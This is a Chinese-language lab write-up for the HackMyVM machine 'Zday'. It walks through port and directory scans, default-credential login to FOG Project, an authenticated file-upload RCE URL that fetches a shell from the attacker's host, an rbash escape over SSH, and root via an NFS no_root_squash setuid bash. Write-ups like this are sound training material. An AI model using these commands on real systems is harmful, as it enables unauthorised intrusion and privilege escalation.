41.Zday

1. 基本信息^toc

2. 信息收集

2.1. 端口扫描


┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# nmap 192.168.56.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 19:53 EST
Nmap scan report for 192.168.56.7
Host is up (0.00029s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
2049/tcp open  nfs
3306/tcp open  mysql
MAC Address: 08:00:27:36:9F:B5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

首页是 appache

2.2. 目录扫描

┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# dirsearch -u http://192.168.56.7
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/hmv/Zday/reports/http_192.168.56.7/_24-12-19_19-55-54.txt

Target: http://192.168.56.7/


[19:56:05] 302 -    0B  - /index.php  ->  /fog/index.php
[19:56:05] 302 -    0B  - /index.php/login/  ->  /fog/index.php
[19:56:10] 403 -  277B  - /server-status
[19:56:10] 403 -  277B  - /server-status/

3. fog project Rce

发现一个fog project的登录框
Pasted image 20241219170042
利用默认账号密码 fog : password 登录上去

看一下版本
Pasted image 20241219170255

搜索一下相关的漏洞

┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# searchsploit fog
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Fog Creek Software FogBugz 4.0 29 - 'default.asp' Cross-Site Scripting                                   | asp/webapps/27071.txt
FOG Forum 0.8.1 - Multiple Local File Inclusions                                                         | php/webapps/5784.txt
FOGProject 1.5.9 - File Upload RCE (Authenticated)                                                       | php/webapps/49811.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

成功找到一个满足版本的 文件上传rce

尝试利用一下

Pasted image 20241219172007
参考文章完成利用 https://muzec0318.github.io/posts/articles/fog.html
但是我卡在了这一步

http://192.168.56.7/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguNTYuNi9teXNoZWxsCg==
&arch=arm64

因为它请求不了那个ftp

3.1. ssh绕过限制

在网站后台可以获取到一个账户名与密码
Pasted image 20241219174002

利用账户密码SSH上去会发现系统会立马中断我的bash


┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject@192.168.56.7
fogproject@192.168.56.7's password:
Linux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 19 04:08:15 2024 from 192.168.56.6
You seem to be using the 'fogproject' system account to logon and work
on your FOG server system.

It's NOT recommended to use this account! Please create a new
account for administrative tasks.

If you re-run the installer it would reset the 'fog' account
password and therefore lock you out of the system!

Take care,
your FOGproject team
Connection to 192.168.56.7 closed.

这里我们利用 ssh fogproject@192.168.56.7 -t sh 进行绕过
也是一个属于 rbash绕过的方式


┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject@192.168.56.7 -t sh
fogproject@192.168.56.7's password:
$ whoami
fogproject
$ id
uid=1001(fogproject) gid=1001(fogproject) groups=1001(fogproject)
$

4. NFS no_root_squash

使用脚本检测出来NFS共享里面启用了 no_root_squash

╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
-rw-r--r-- 1 root root 174 Mar 10  2021 /etc/exports
/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid=0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid=1)

其中 /images/dev 目录我们具有读写权限

参考利用 https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
Pasted image 20241219175540

#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash

#Victim
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell

5. bash运行不了怎么办

安装hacktrick 上面利用可能会出现bash在靶机上运行不了
报错

$ ./bash -p
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.38' not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./bash)

这是由于版本不对
我们重新编译一个传过去即可

https://ftp.gnu.org/gnu/bash/ 下载一个时间差不多的版本。这里靶机是21年的我就下一个21年的bash
Pasted image 20241219182432

攻击机
tar -zxvf bash-5.1.8.tar.gz
./configure --enable-static-link --without-bash-malloc
make
cp bash /tmp/pe
chmod +s /tmp/pe/bash

受害机
./bash -p

bash-5.1# cat /root/root.txt
ihavebeenherealways

bash-5.1# cat /home/estas/user.txt
whereihavebeen